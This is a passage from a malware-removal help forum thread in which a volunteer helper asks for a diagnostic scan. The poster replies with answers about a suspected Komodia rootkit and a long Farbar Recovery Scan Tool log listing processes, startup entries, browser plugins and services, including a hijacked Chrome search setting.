  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Edited by Jo*, 16 April 2016 - 04:53 PM.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#13 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
  • Local time:04:37 PM

Posted 30 April 2016 - 01:10 PM

Hi Jo,

 

1) I thought it was Komodia because originally Malwarebytes and a few others were reporting it on my PC, but after each clean it would remain there. komodia rootkit

2) Yes, I had uninstalled it, as my system resources kept running low and I was getting warnings.

3) RoNiN is the account I created.

4) I only see 1 user account in my profile - RONIN-LAPTOP/RoNiN

5)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (30-04-2016 14:03:36)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 01 C:\WINDOWS\SysWOW64\NLAapi.dll [64000 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 02 C:\WINDOWS\SysWOW64\napinsp.dll [54784 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\napinsp.dll"
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 04 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 05 C:\WINDOWS\SysWOW64\mswsock.dll [306528 2015-07-10] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 06 C:\WINDOWS\SysWOW64\winrnr.dll [23552 2015-07-09] (Microsoft Corporation)ATTENTION: LibraryPath should be "%SystemRoot%\System32\winrnr.dll"
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-04-13]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-28]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-26]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
